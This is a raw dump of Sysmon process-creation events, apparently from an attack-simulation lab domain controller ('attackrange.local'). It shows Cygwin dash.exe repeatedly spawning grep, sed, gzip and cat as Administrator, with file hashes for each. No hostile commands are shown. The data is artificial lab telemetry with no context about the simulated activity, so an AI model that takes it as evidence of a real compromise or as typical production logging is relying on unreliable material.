14:55:55.127{A8622C2F-53FB-6078-CE08-00000000AE01}6440C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FB-6078-CB08-00000000AE01}3176C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047854Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.127{A8622C2F-53FB-6078-CD08-00000000AE01}4568C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047835Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.119{A8622C2F-53FB-6078-CC08-00000000AE01}6448C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FB-6078-CA08-00000000AE01}5776C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047834Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.119{A8622C2F-53FB-6078-CB08-00000000AE01}3176C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047822Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.112{A8622C2F-53FB-6078-CA08-00000000AE01}5776C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047809Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.104{A8622C2F-53FB-6078-C908-00000000AE01}6968C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FB-6078-C808-00000000AE01}6884C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047799Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.097{A8622C2F-53FB-6078-C808-00000000AE01}6884C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047787Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.088{A8622C2F-53FB-6078-C708-00000000AE01}6196C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FB-6078-C508-00000000AE01}5864C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047769Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.081{A8622C2F-53FB-6078-C608-00000000AE01}5344C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FB-6078-C308-00000000AE01}5224C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047767Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.081{A8622C2F-53FB-6078-C508-00000000AE01}5864C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047747Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.073{A8622C2F-53FB-6078-C408-00000000AE01}924C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FB-6078-C208-00000000AE01}6672C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047746Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.073{A8622C2F-53FB-6078-C308-00000000AE01}5224C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047734Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.065{A8622C2F-53FB-6078-C208-00000000AE01}6672C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047722Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.057{A8622C2F-53FB-6078-C108-00000000AE01}2408C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FB-6078-C008-00000000AE01}4288C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047712Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.050{A8622C2F-53FB-6078-C008-00000000AE01}4288C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047699Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.042{A8622C2F-53FB-6078-BF08-00000000AE01}2112C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FB-6078-BD08-00000000AE01}5084C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047681Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.034{A8622C2F-53FB-6078-BE08-00000000AE01}1140C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FB-6078-BB08-00000000AE01}6808C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047679Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.034{A8622C2F-53FB-6078-BD08-00000000AE01}5084C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047660Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.027{A8622C2F-53FB-6078-BC08-00000000AE01}4424C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FB-6078-BA08-00000000AE01}5852C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047659Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.027{A8622C2F-53FB-6078-BB08-00000000AE01}6808C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047647Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.020{A8622C2F-53FB-6078-BA08-00000000AE01}5852C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047634Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.012{A8622C2F-53FB-6078-B908-00000000AE01}4604C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FB-6078-B808-00000000AE01}5628C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047624Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.005{A8622C2F-53FB-6078-B808-00000000AE01}5628C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047612Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.996{A8622C2F-53FA-6078-B708-00000000AE01}1392C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FA-6078-B508-00000000AE01}3156C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047594Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.989{A8622C2F-53FA-6078-B608-00000000AE01}6968C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FA-6078-B308-00000000AE01}5860C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047592Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.989{A8622C2F-53FA-6078-B508-00000000AE01}3156C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047573Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.981{A8622C2F-53FA-6078-B408-00000000AE01}6196C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FA-6078-B208-00000000AE01}6336C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047572Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.981{A8622C2F-53FA-6078-B308-00000000AE01}5860C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047560Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.974{A8622C2F-53FA-6078-B208-00000000AE01}6336C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047548Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.966{A8622C2F-53FA-6078-B108-00000000AE01}3420C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FA-6078-B008-00000000AE01}1628C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047537Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.959{A8622C2F-53FA-6078-B008-00000000AE01}1628C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047525Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.951{A8622C2F-53FA-6078-AF08-00000000AE01}3368C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FA-6078-AD08-00000000AE01}7140C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047507Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.943{A8622C2F-53FA-6078-AE08-00000000AE01}2408C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FA-6078-AB08-00000000AE01}4288C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047505Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.943{A8622C2F-53FA-6078-AD08-00000000AE01}7140C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047487Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.936{A8622C2F-53FA-6078-AC08-00000000AE01}5952C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FA-6078-AA08-00000000AE01}3008C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047485Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.936{A8622C2F-53FA-6078-AB08-00000000AE01}4288C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047472Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.928{A8622C2F-53FA-6078-AA08-00000000AE01}3008C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047460Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.921{A8622C2F-53FA-6078-A908-00000000AE01}6440C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FA-6078-A808-00000000AE01}3208C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047450Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.914{A8622C2F-53FA-6078-A808-00000000AE01}3208C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047437Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.905{A8622C2F-53FA-6078-A708-00000000AE01}5640C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FA-6078-A508-00000000AE01}6456C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047419Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.897{A8622C2F-53FA-6078-A608-00000000AE01}5144C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FA-6078-A308-00000000AE01}5832C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047417Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.897{A8622C2F-53FA-6078-A508-00000000AE01}6456C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047399Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 